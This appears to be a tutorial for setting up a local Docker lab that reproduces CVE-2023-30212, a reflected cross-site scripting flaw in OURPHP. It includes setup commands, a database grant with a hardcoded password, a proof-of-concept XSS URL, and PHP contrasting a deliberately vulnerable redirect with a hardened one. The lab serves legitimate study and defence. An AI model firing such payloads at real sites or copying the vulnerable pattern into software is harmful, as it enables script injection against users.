## https://sploitus.com/exploit?id=C96F7F94-2E5D-5A57-B19A-2F6DA8535C10
# Creating a Vulnerable Docker Environment (CVE-2023-30212)
## **Description**
CVE-2023-30212 is a security vulnerability that affects OURPHP versions 7.2.0 and earlier.
OURPHP <= 7.2.0 is vulnerable to Cross-Site Scripting (XSS) via `/client/manage/ourphp_out.php`.
># Steps
- **Let's download the Dockerfile**
- **Open a terminal in the folder where you downloaded the Dockerfile**
- **Install Docker on your machine**
```
kali@kali:~$ sudo apt install -y docker.io
```
- **Create a new Docker image**
```
kali@kali:~$ docker build -t test .
```
- **Create a new Docker container**
```
kali@kali:~$ docker run -d -p 80:80 test
```
># Configure the web
- **Open a shell in the Docker container**
```
kali@kali:~$ docker ps
```
**Now get the container ID, for example 0ac7c99ad8e7**
```
kali@kali:~$ docker exec -it 0ac7c99ad8e7 /bin/bash
root@0ac7c99ad8e7:/var/www/html#
```
**You now have a shell inside the container**
- **Set up the database**
```
root@0ac7c99ad8e7:/var/www/html# mysql
```
**Then type these commands:**
```
GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY 'naseef' WITH GRANT OPTION;
FLUSH PRIVILEGES;
```
*This MySQL or MariaDB statement grants all privileges on all databases and tables to the 'root' user.*

**Now that the password is set, go to the website, enter the password, and complete the configuration**
># Exploiting vulnerability
URL:
```
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>
```
*The website is vulnerable to XSS: the script supplied in this URL parameter executes when the URL is loaded.*
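
The payload above begins with `</script>`, which suggests the `out` value is written into an inline script block. The PHP below is an added example, not OURPHP's code and not from the original README: it contrasts that assumed pattern with a hardened version. The function names, the `location.replace` sink and the sample path `/client/manage/login.php` are assumptions made for illustration.

```php
<?php
// Added illustration; NOT OURPHP source code.
// Assumption: the `out` parameter is echoed into a JS string inside <script>.

// Vulnerable pattern (assumed): raw concatenation into the script block.
function render_vulnerable(string $out): string {
    return "<script>location.replace('" . $out . "');</script>";
}

// Accept only same-site relative paths; anything else falls back to "/".
function safe_redirect_target(string $out, string $fallback = '/'): string {
    // One leading slash, no "//host", no scheme, no markup characters.
    if (!preg_match('#^/(?!/)[A-Za-z0-9_\-./?=&%]*\z#', $out)) {
        return $fallback;
    }
    return $out;
}

// Hardened: validate the target, then encode it for the JavaScript context.
function render_hardened(string $out): string {
    $target = safe_redirect_target($out);
    // JSON_HEX_* emits <, >, &, ' and " as \uXXXX escapes, so the value can
    // neither end the string literal nor close the <script> element.
    $js = json_encode(
        $target,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
    return "<script>location.replace(" . $js . ");</script>";
}

// Value of `out` taken from the URL shown on this page.
$payload = '</script><script>alert(`xss`)</script>';

echo render_vulnerable($payload), PHP_EOL;   // script element is broken out of
echo render_hardened($payload), PHP_EOL;     // rejected, redirects to "/"
echo render_hardened('/client/manage/login.php'), PHP_EOL; // constructed sample path
```

Allowlisting the redirect target addresses the logic flaw, and the context-aware encoding is the second layer in case the allowlist is later loosened.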